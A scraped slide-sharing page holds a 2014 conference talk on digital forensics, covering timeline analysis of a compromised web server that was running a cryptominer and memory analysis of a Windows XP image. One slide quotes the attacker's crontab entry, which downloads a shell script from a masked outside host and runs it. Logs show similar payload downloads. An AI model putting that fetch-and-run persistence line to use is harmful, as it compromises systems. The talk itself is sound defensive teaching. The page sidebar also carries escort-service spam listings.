Suche senden
Hochladen
Adventures in Digital Forensics
•
2 gefällt mir
•
3,323 views
_
_xhr_
Folgen
My talk about post-mortem and volatily memory forensics from the EasterHegg 2014.
Weniger lesen
Mehr lesen
Technologie
Melden
Teilen
Melden
Teilen
1 von 52
Jetzt herunterladen
Downloaden Sie, um offline zu lesen
Empfohlen
LISA Qooxdoo Tutorial Handouts
LISA Qooxdoo Tutorial Handouts
Tobias Oetiker
SCWCD : Handling exceptions : CHAP : 5
SCWCD : Handling exceptions : CHAP : 5
Ben Abdallah Helmi
Fabio Ghioni
Fabio Ghioni
Fabio Ghioni
Configuring Greenstone's OAI server
Configuring Greenstone's OAI server
Diego Spano
User Profiles: I Didn't Know I Could Do That (Updated Demo)
User Profiles: I Didn't Know I Could Do That (Updated Demo)
Stacy Deere
Hibernate reference pt-br
Hibernate reference pt-br
Leonardo Brancalhão
Collaboration with Eclipse final
Collaboration with Eclipse final
Kenu, GwangNam Heo
ORCID ED Report 10292013
ORCID ED Report 10292013
ORCID, Inc
Empfohlen
LISA Qooxdoo Tutorial Handouts
LISA Qooxdoo Tutorial Handouts
Tobias Oetiker
SCWCD : Handling exceptions : CHAP : 5
SCWCD : Handling exceptions : CHAP : 5
Ben Abdallah Helmi
Fabio Ghioni
Fabio Ghioni
Fabio Ghioni
Configuring Greenstone's OAI server
Configuring Greenstone's OAI server
Diego Spano
User Profiles: I Didn't Know I Could Do That (Updated Demo)
User Profiles: I Didn't Know I Could Do That (Updated Demo)
Stacy Deere
Hibernate reference pt-br
Hibernate reference pt-br
Leonardo Brancalhão
Collaboration with Eclipse final
Collaboration with Eclipse final
Kenu, GwangNam Heo
ORCID ED Report 10292013
ORCID ED Report 10292013
ORCID, Inc
What's Next with Government Big Data
What's Next with Government Big Data
GovLoop
Lacerte Helpful Resources
Lacerte Helpful Resources
intuitaccts
Web service overview
Web service overview
Saran Yuwanna
缓存技术浅谈
缓存技术浅谈
Robbin Fan
AVG Community Powered Threat Report: Q1 2012
AVG Community Powered Threat Report: Q1 2012
AVG Technologies AU
Social Networking
Social Networking
Caroline Cerveny
Montando seu DataCenter Pessoal - Fernando Massen
Montando seu DataCenter Pessoal - Fernando Massen
Tchelinux
Caderno SISP 2012
Caderno SISP 2012
GovBR
Especial Linux Magazine Software Público
Especial Linux Magazine Software Público
GovBR
SCWCD : The servlet model CHAP : 2
SCWCD : The servlet model CHAP : 2
Ben Abdallah Helmi
Tomcat Maven Plugin
Tomcat Maven Plugin
Olivier Lamy
Nosotros Elmedio
Nosotros Elmedio
Espacio Público
Mision y vision .pdf ss
Mision y vision .pdf ss
Ronnyonam
Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...
Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...
Quinnipiac University
State of virtualisation -- 2012
State of virtualisation -- 2012
Jonathan Sinclair
El papel del vídeo en la Web 2.0
El papel del vídeo en la Web 2.0
Pablo Olmeda
Django - the first five years
Django - the first five years
Jacob Kaplan-Moss
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
naman860154
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAG
Sujit Pal
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
RTylerCroy
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
Enterprise Knowledge
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
Gabriella Davis
Weitere ähnliche Inhalte
Andere mochten auch
What's Next with Government Big Data
What's Next with Government Big Data
GovLoop
Lacerte Helpful Resources
Lacerte Helpful Resources
intuitaccts
Web service overview
Web service overview
Saran Yuwanna
缓存技术浅谈
缓存技术浅谈
Robbin Fan
AVG Community Powered Threat Report: Q1 2012
AVG Community Powered Threat Report: Q1 2012
AVG Technologies AU
Social Networking
Social Networking
Caroline Cerveny
Montando seu DataCenter Pessoal - Fernando Massen
Montando seu DataCenter Pessoal - Fernando Massen
Tchelinux
Caderno SISP 2012
Caderno SISP 2012
GovBR
Especial Linux Magazine Software Público
Especial Linux Magazine Software Público
GovBR
SCWCD : The servlet model CHAP : 2
SCWCD : The servlet model CHAP : 2
Ben Abdallah Helmi
Tomcat Maven Plugin
Tomcat Maven Plugin
Olivier Lamy
Nosotros Elmedio
Nosotros Elmedio
Espacio Público
Mision y vision .pdf ss
Mision y vision .pdf ss
Ronnyonam
Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...
Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...
Quinnipiac University
State of virtualisation -- 2012
State of virtualisation -- 2012
Jonathan Sinclair
El papel del vídeo en la Web 2.0
El papel del vídeo en la Web 2.0
Pablo Olmeda
Django - the first five years
Django - the first five years
Jacob Kaplan-Moss
Andere mochten auch
(17)
What's Next with Government Big Data
What's Next with Government Big Data
Lacerte Helpful Resources
Lacerte Helpful Resources
Web service overview
Web service overview
缓存技术浅谈
缓存技术浅谈
AVG Community Powered Threat Report: Q1 2012
AVG Community Powered Threat Report: Q1 2012
Social Networking
Social Networking
Montando seu DataCenter Pessoal - Fernando Massen
Montando seu DataCenter Pessoal - Fernando Massen
Caderno SISP 2012
Caderno SISP 2012
Especial Linux Magazine Software Público
Especial Linux Magazine Software Público
SCWCD : The servlet model CHAP : 2
SCWCD : The servlet model CHAP : 2
Tomcat Maven Plugin
Tomcat Maven Plugin
Nosotros Elmedio
Nosotros Elmedio
Mision y vision .pdf ss
Mision y vision .pdf ss
Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...
Enterprise Resource Planning in the IT Field- an Opportunity for System Devel...
State of virtualisation -- 2012
State of virtualisation -- 2012
El papel del vídeo en la Web 2.0
El papel del vídeo en la Web 2.0
Django - the first five years
Django - the first five years
Kürzlich hochgeladen
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
naman860154
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAG
Sujit Pal
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
RTylerCroy
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
Enterprise Knowledge
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
Gabriella Davis
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Alan Dix
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
ThousandEyes
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
HampshireHUG
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
Results
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
Pooja Nehwal
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
The Digital Insurer
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
Sinan KOZAK
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
Enterprise Knowledge
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
OnBoard
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
hans926745
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
Delhi Call girls
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
gurkirankumar98700
How to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
naman860154
Kürzlich hochgeladen
(20)
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAG
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
How to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
Adventures in Digital Forensics
1.
Adventures in Digital Forensics xhr xhr
giessen.ccc.de
2.
xhr Easterhegg 2014
2 $ whoami
3.
xhr Easterhegg 2014
3 What is Digital Forensics?
4.
xhr Easterhegg 2014
4 What the media thinks...
5.
xhr Easterhegg 2014
5 + Flickr. West Midlands Police. CC-BY-2.0
6.
xhr Easterhegg 2014
6 What it is really about ...
7.
xhr Easterhegg 2014
7 Flickr. Naughty Architect. CC-BY-2.0
8.
xhr Easterhegg 2014
8 Srsly? Crawling a Shitload of Data * Hey, that's cool. It's Big Data[TM] !!1 *
9.
xhr Easterhegg 2014
9 Discover unknown malware * sadly, known as well :/ *
10.
xhr Easterhegg 2014
11 Learn new Things[TM]
11.
xhr Easterhegg 2014
12 Two Approaches
12.
xhr Easterhegg 2014
13 Disc Forensics
13.
xhr Easterhegg 2014
14 Memory Forensics
14.
xhr Easterhegg 2014
15 Post-mortem Analysis
15.
xhr Easterhegg 2014
16 MAC Time Analysis
16.
xhr Easterhegg 2014
17 Tim e stam pM AC User Perm issions Path Size Time Last Modified Last Accessed Last Changed Birth time
17.
xhr Easterhegg 2014
18 [...] m...,rwrr,wwwdata,wwwdata,0,"/var/tmp/checkblocks" m...,rwxrxrx,wwwdata,wwwdata,0,"/var/tmp/.tar" m...,rwxrxrx,wwwdata,wwwdata,0,"/var/tmp/.ew3" m...,rwxrxrx,wwwdata,wwwdata,0,"/var/tmp/ew3" m...,rwxrxrx,wwwdata,wwwdata,0,"/var/tmp/.bbb" m...,rwxrxrx,wwwdata,wwwdata,0,"/var/tmp/apache2" m...,rwrr,wwwdata,wwwdata,0,"/var/tmp/checkfs" m...,rwrr,wwwdata,wwwdata,0,"/var/tmp/checkswap" m...,rwrr,wwwdata,wwwdata,0,"/var/tmp/e.tar.xz" ..c.,rwxrxrx,wwwdata,wwwdata,0,"/var/tmp/ew3" .ac.,rwxrxrx,wwwdata,wwwdata,0,"/var/tmp/tar" .a..,rwxrxrx,wwwdata,wwwdata,0,"/var/tmp/ew3" ma..,rwrr,wwwdata,wwwdata,0,"/tmp/.ICEunix/log/cpuminerquark.zip" .a..,rwrr,wwwdata,wwwdata,0,"/tmp/.ICEunix/log/include/zconf.h" .a..,rwrr,wwwdata,wwwdata,0,"/tmp/.ICEunix/log/include/zlib.h" .a..,rwxrxrx,wwwdata,wwwdata,0,"/tmp/.ICEunix/log/bin/externalip" .a..,rwxrxrx,wwwdata,wwwdata,0,"/tmp/.ICEunix/log/bin/upnpc" .a..,rwr—r,wwwdata,wwwdata,0,"/tmp/.ICEunix/log/lib/libminiupnpc.a" [...]
18.
xhr Easterhegg 2014
19 [...] m...,rwrr,wwwdata,wwwdata,0,"/var/tmp/checkblocks" m...,rwxrxrx,wwwdata,wwwdata,0,"/var/tmp/.tar" m...,rwxrxrx,wwwdata,wwwdata,0,"/var/tmp/.ew3" m...,rwxrxrx,wwwdata,wwwdata,0,"/var/tmp/ew3" m...,rwxrxrx,wwwdata,wwwdata,0,"/var/tmp/.bbb" m...,rwxrxrx,wwwdata,wwwdata,0,"/var/tmp/apache2" m...,rwrr,wwwdata,wwwdata,0,"/var/tmp/checkfs" m...,rwrr,wwwdata,wwwdata,0,"/var/tmp/checkswap" m...,rwrr,wwwdata,wwwdata,0,"/var/tmp/e.tar.xz" ..c.,rwxrxrx,wwwdata,wwwdata,0,"/var/tmp/ew3" .ac.,rwxrxrx,wwwdata,wwwdata,0,"/var/tmp/tar" .a..,rwxrxrx,wwwdata,wwwdata,0,"/var/tmp/ew3" ma..,rwrr,wwwdata,wwwdata,0,"/tmp/.ICEunix/log/cpuminerquark.zip" .a..,rwrr,wwwdata,wwwdata,0,"/tmp/.ICEunix/log/include/zconf.h" .a..,rwrr,wwwdata,wwwdata,0,"/tmp/.ICEunix/log/include/zlib.h" .a..,rwxrxrx,wwwdata,wwwdata,0,"/tmp/.ICEunix/log/bin/externalip" .a..,rwxrxrx,wwwdata,wwwdata,0,"/tmp/.ICEunix/log/bin/upnpc" .a..,rwr—r,wwwdata,wwwdata,0,"/tmp/.ICEunix/log/lib/libminiupnpc.a" [...]
19.
xhr Easterhegg 2014
20 [...] .ac.,rwxrxrx,wwwdata,wwwdata,0,"/var/tmp/.bbb" .ac.,rwxrxrx,wwwdata,wwwdata,0,"/var/tmp/.ew3" .ac.,rwxrxrx,wwwdata,wwwdata,0,"/var/tmp/.tar" m.c.,rwxrxrx,wwwdata,wwwdata,0,"/tmp/.ICEunix/cw" m...,rwsrsrx,wwwdata,wwwdata,0,"/tmp/.ICEunix/sid" mac.,rwrr,wwwdata,wwwdata,0,"/tmp/.a" ..c.,rw,wwwdata,wwwdata,0,"/var/www/.ssh/authorized_keys" .a..,rwxrxrx,wwwdata,wwwdata,0,"/tmp/.ICEunix/cw" ..c.,rwsrsrx,wwwdata,wwwdata,0,"/tmp/.ICEunix/sid" ..c.,drwx,wwwdata,wwwdata,0,"/var/www/.ssh" .a..,drwx,wwwdata,wwwdata,0,"/var/www/.ssh" .a..,rwrr,wwwdata,root,0,"/home/cron/wwwdata.tab" m.c.,rw,wwwdata,ssh,0,"/var/spool/cron/crontabs/wwwdata" .a..,rw,wwwdata,ssh,0,"/var/spool/cron/crontabs/wwwdata" [...]
20.
xhr Easterhegg 2014
21 [...] .ac.,rwxrxrx,wwwdata,wwwdata,0,"/var/tmp/.bbb" .ac.,rwxrxrx,wwwdata,wwwdata,0,"/var/tmp/.ew3" .ac.,rwxrxrx,wwwdata,wwwdata,0,"/var/tmp/.tar" m.c.,rwxrxrx,wwwdata,wwwdata,0,"/tmp/.ICEunix/cw" m...,rwsrsrx,wwwdata,wwwdata,0,"/tmp/.ICEunix/sid" mac.,rwrr,wwwdata,wwwdata,0,"/tmp/.a" ..c.,rw,wwwdata,wwwdata,0,"/var/www/.ssh/authorized_keys" .a..,rwxrxrx,wwwdata,wwwdata,0,"/tmp/.ICEunix/cw" ..c.,rwsrsrx,wwwdata,wwwdata,0,"/tmp/.ICEunix/sid" ..c.,drwx,wwwdata,wwwdata,0,"/var/www/.ssh" .a..,drwx,wwwdata,wwwdata,0,"/var/www/.ssh" .a..,rwrr,wwwdata,root,0,"/home/cron/wwwdata.tab" m.c.,rw,wwwdata,ssh,0,"/var/spool/cron/crontabs/wwwdata" .a..,rw,wwwdata,ssh,0,"/var/spool/cron/crontabs/wwwdata" [...]
21.
xhr Easterhegg 2014
22 On-disk Analysis
22.
xhr Easterhegg 2014
23 host:/tmp/.ICEunix/log# ls l total 5088 rwrr 1 wwwdata wwwdata 238 Dec 17 16:26 drwxrxrx 2 wwwdata wwwdata 4096 Dec 15 04:01 bin rwrr 1 wwwdata wwwdata 526652 Aug 20 22:05 cpuminerquark.zip rwrr 1 wwwdata wwwdata 526652 Aug 20 22:05 cpuminerquark.zip.1 rwrr 1 wwwdata wwwdata 526652 Aug 20 22:05 cpuminerquark.zip.2 rwrr 1 wwwdata wwwdata 526652 Aug 20 22:05 cpuminerquark.zip.3 drwxrxrx 3 wwwdata wwwdata 22 Dec 14 12:41 doc drwxrxrx 5 wwwdata wwwdata 126 Dec 15 04:01 include drwxrxrx 4 wwwdata wwwdata 4096 Dec 17 16:26 lib drwxrxrx 3 wwwdata wwwdata 17 Dec 14 12:41 man rwxrxrx 1 wwwdata wwwdata 0 Dec 14 03:24 rsyslogd rwrr 1 wwwdata wwwdata 3077358 Dec 16 16:53 sshc.tgz drwxrxrx 6 wwwdata wwwdata 71 Dec 15 03:53 ssl
23.
xhr Easterhegg 2014
24 Crontab FTW! @weekly wget q hxxp://221.132.37.XX/scen O /tmp/sh; sh /tmp/sh; rm rd /tmp/sh
24.
xhr Easterhegg 2014
25 Log Files
25.
xhr Easterhegg 2014
26 [error] [client X] 20XXXXXX 03:09:34 hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XXXXXX 03:09:34 (208 KB/s) `d1e.txt' saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 :: 0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 :: :: :: 141k [error] [client X] sh: lwpdownload: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [s sigspec | n signum | sigspec] pid | jobspec ... or kill l [sigspec]
26.
xhr Easterhegg 2014
27 [error] [client X] 20XXXXXX 03:09:34 hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XXXXXX 03:09:34 (208 KB/s) `d1e.txt' saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 :: 0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 :: :: :: 141k [error] [client X] sh: lwpdownload: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [s sigspec | n signum | sigspec] pid | jobspec ... or kill l [sigspec]
27.
xhr Easterhegg 2014
28 [error] [client X] 20XXXXXX 03:09:34 hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XXXXXX 03:09:34 (208 KB/s) `d1e.txt' saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 :: 0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 :: :: :: 141k [error] [client X] sh: lwpdownload: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [s sigspec | n signum | sigspec] pid | jobspec ... or kill l [sigspec]
28.
xhr Easterhegg 2014
29 [error] [client X] 20XXXXXX 03:09:34 hxxp://93.174.4.XX/xmrl/d1e.txt [error] [client X] Connecting to 93.174.4.XX:80... [error] [client X] connected. [error] [client X] HTTP request sent, awaiting response... [error] [client X] 200 OK [...] [error] [client X] Saving to: `d1e.txt‚ [error] [client X] 20XXXXXX 03:09:34 (208 KB/s) `d1e.txt' saved [16732/16732] [error] [client X] % Total % Received % Xferd Average Speed Time Time Time Current [error] [client X] Dload Upload Total Spent Left Speed [error] [client X] r 6 16732 6 1180 0 0 10717 0 0:00:01 :: 0:00:01 10717 error] [client X] r100 16732 100 16732 0 0 76812 0 :: :: :: 141k [error] [client X] sh: lwpdownload: command not found [error] [client X] sh: fetch: command not found [error] [client X] kill: usage: kill [s sigspec | n signum | sigspec] pid | jobspec ... or kill l [sigspec]
29.
xhr Easterhegg 2014
30 Write Remote Logs!!1
30.
xhr Easterhegg 2014
31 And use Smart Indexing loghost:/syslog/live $ du -hs 4.5T . :)
31.
xhr Easterhegg 2014
32 Memory Forensics 101
32.
xhr Easterhegg 2014
33 Mem dump == IDDQD
33.
xhr Easterhegg 2014
34 Linux → Windows
34.
xhr Easterhegg 2014
35 Details about the Victim Determining profile based on KDBG search... Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86) PAE type : PAE DTB : 0x28a000L KDBG : 0x80545ce0 Number of Processors : 1 Image Type (Service Pack) : 3 $ file ram.elf ram.elf: ELF 64bit LSB core file x8664, version 1 (SYSV) $ ls l ram.elf 293M rw 1 xhr xhr 293M Apr 19 15:29 ram.elf
35.
xhr Easterhegg 2014
36 Check Networking
36.
xhr Easterhegg 2014
37 Offset(P) Local Address Remote Address Pid 0x017af800 10.0.2.15:2859 4.26.224.125:80 360 0x017c3008 10.0.2.15:2841 4.26.224.125:80 360 0x017c3270 10.0.2.15:2845 68.232.35.169:80 360 0x017c42c0 10.0.2.15:2771 31.13.64.145:443 360 0x017c45d0 10.0.2.15:2770 23.37.37.163:80 360 0x017d2aa8 10.0.2.15:2857 4.26.224.125:80 360 0x017d75c0 10.0.2.15:2846 162.159.243.176:80 360 0x017d79e8 10.0.2.15:2773 2.18.162.110:443 360 0x017d7cf8 10.0.2.15:2772 95.100.249.129:80 360 0x017d8d28 10.0.2.15:2858 4.26.224.125:80 360 0x017db9e8 10.0.2.15:2778 131.253.37.30:80 360 0x017dbcf8 10.0.2.15:2867 8.21.198.146:80 360 0x017ddbe8 10.0.2.15:2769 23.37.37.163:80 360 0x017de6e8 10.0.2.15:2761 91.103.137.3:80 360 0x01803968 10.0.2.15:2754 23.43.118.238:80 360 0x01803e68 10.0.2.15:2757 173.194.69.139:80 3460 0x0195e458 10.0.2.15:2854 31.192.116.24:80 360
37.
xhr Easterhegg 2014
38 Offset(P) Local Address Remote Address Pid 0x017af800 10.0.2.15:2859 4.26.224.125:80 360 0x017c3008 10.0.2.15:2841 4.26.224.125:80 360 0x017c3270 10.0.2.15:2845 68.232.35.169:80 360 0x017c42c0 10.0.2.15:2771 31.13.64.145:443 360 0x017c45d0 10.0.2.15:2770 23.37.37.163:80 360 0x017d2aa8 10.0.2.15:2857 4.26.224.125:80 360 0x017d75c0 10.0.2.15:2846 162.159.243.176:80 360 0x017d79e8 10.0.2.15:2773 2.18.162.110:443 360 0x017d7cf8 10.0.2.15:2772 95.100.249.129:80 360 0x017d8d28 10.0.2.15:2858 4.26.224.125:80 360 0x017db9e8 10.0.2.15:2778 131.253.37.30:80 360 0x017dbcf8 10.0.2.15:2867 8.21.198.146:80 360 0x017ddbe8 10.0.2.15:2769 23.37.37.163:80 360 0x017de6e8 10.0.2.15:2761 91.103.137.3:80 360 0x01803968 10.0.2.15:2754 23.43.118.238:80 360 0x01803e68 10.0.2.15:2757 173.194.69.139:80 3460 0x0195e458 10.0.2.15:2854 31.192.116.24:80 360
38.
xhr Easterhegg 2014
39 Check IE History
39.
xhr Easterhegg 2014
40 admin@about:Home admin@http://127.0.0.1:1088/app/index.html admin@http://ccc.de admin@http://ccc.de/de/rss/updates.rdf admin@http://ccc.de/de/rss/updates.xml admin@http://de.msn.com/?rd=1&ucc=DE&dcc=DE&opt=0 admin@http://edpn.ebay.com/engagement?INIT=575302488402|22076974|707189966101462|1|0| 1||http://de.msn.com/?rd=1&ucc=DE&dcc=DE&opt=0 admin@http://go.microsoft.com/fwlink/?LinkID=121792 admin@http://home.microsoft.com admin@https://downloadinstaller.cdn.mozilla.net/pub/firefox/releases/26.0/win32/en US/Firefox%20Setup%20Stub%2026.0.exe admin@http://update.microsoft.com/favicon.ico admin@http://update.microsoft.com/microsoftupdate/v6/default.aspx admin@http://update.microsoft.com/microsoftupdate/v6/default.aspx?ln=enus admin@http://update.microsoft.com/microsoftupdate/v6/resultslist.aspx?ln=enus&id=6 admin@http://windowsupdate.microsoft.com/favicon.ico admin@http://windowsupdate.microsoft.com/windowsupdate/v6/default.aspx admin@http://windowsupdate.microsoft.com/windowsupdate/v6/default.aspx?ln=enus admin@http://windowsupdate.microsoft.com/windowsupdate/v6/resultslist.aspx?ln=en us&id=6 admin@http://windowsupdate.microsoft.com/windowsupdate/v6/splash.aspx?ln=enus&page=8 admin@http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome admin@http://www.mozilla.org/enUS admin@http://www.mozilla.org/enUS/products/download.html?product=firefox stub&os=win&lang=enUS admin@http://www.msn.com admin@http://www.youporn.com/rss admin@res://ief admin@res://ieframe.dll/tabswelcome.htm
40.
xhr Easterhegg 2014
42 Any Malicious Processes?
41.
xhr Easterhegg 2014
43 Offset(V) Name PID PPID Thds Hnds 0x819cca00 System 4 0 53 359 0x81843930 SMSS.EXE 324 4 3 19 0x8170dda0 CSRSS.EXE 608 324 9 433 0x8171c1c8 WINLOGON.EXE 632 324 17 504 0x8170ba98 SERVICES.EXE 676 632 15 258 0x81706a98 LSASS.EXE 688 632 24 369 0x8196e560 VBOXSERVICE.EXE 840 676 8 105 0x81793da0 SVCHOST.EXE 884 676 18 201 0x8170db20 SVCHOST.EXE 972 676 9 248 0x81823990 SVCHOST.EXE 1092 676 77 1492 0x81745c18 SVCHOST.EXE 1140 676 6 84 0x81703560 SVCHOST.EXE 1176 676 12 172 0x817d8730 EXPLORER.EXE 1548 1496 21 672 0x8183caf0 SPOOLSV.EXE 1664 676 10 117 0x81738da0 VBOXTRAY.EXE 1860 1548 10 936 0x81724470 CTFMON.EXE 1872 1548 4 94 0x816f0650 SVCHOST.EXE 584 676 4 105 0x817f4da0 ALG.EXE 460 676 6 106 0x819215d0 firefox.exe 3460 1548 36 462 0x817313c0 IEXPLORE.EXE 4008 1548 16 412 0x81706228 IEXPLORE.EXE 360 4008 29 994 0x81870888 UPS_COLLECT_LET 1156 1548 4 34
42.
xhr Easterhegg 2014
44 Offset(V) Name PID PPID Thds Hnds 0x819cca00 System 4 0 53 359 0x81843930 SMSS.EXE 324 4 3 19 0x8170dda0 CSRSS.EXE 608 324 9 433 0x8171c1c8 WINLOGON.EXE 632 324 17 504 0x8170ba98 SERVICES.EXE 676 632 15 258 0x81706a98 LSASS.EXE 688 632 24 369 0x8196e560 VBOXSERVICE.EXE 840 676 8 105 0x81793da0 SVCHOST.EXE 884 676 18 201 0x8170db20 SVCHOST.EXE 972 676 9 248 0x81823990 SVCHOST.EXE 1092 676 77 1492 0x81745c18 SVCHOST.EXE 1140 676 6 84 0x81703560 SVCHOST.EXE 1176 676 12 172 0x817d8730 EXPLORER.EXE 1548 1496 21 672 0x8183caf0 SPOOLSV.EXE 1664 676 10 117 0x81738da0 VBOXTRAY.EXE 1860 1548 10 936 0x81724470 CTFMON.EXE 1872 1548 4 94 0x816f0650 SVCHOST.EXE 584 676 4 105 0x817f4da0 ALG.EXE 460 676 6 106 0x819215d0 firefox.exe 3460 1548 36 462 0x817313c0 IEXPLORE.EXE 4008 1548 16 412 0x81706228 IEXPLORE.EXE 360 4008 29 994 0x81870888 UPS_COLLECT_LET 1156 1548 4 34
43.
xhr Easterhegg 2014
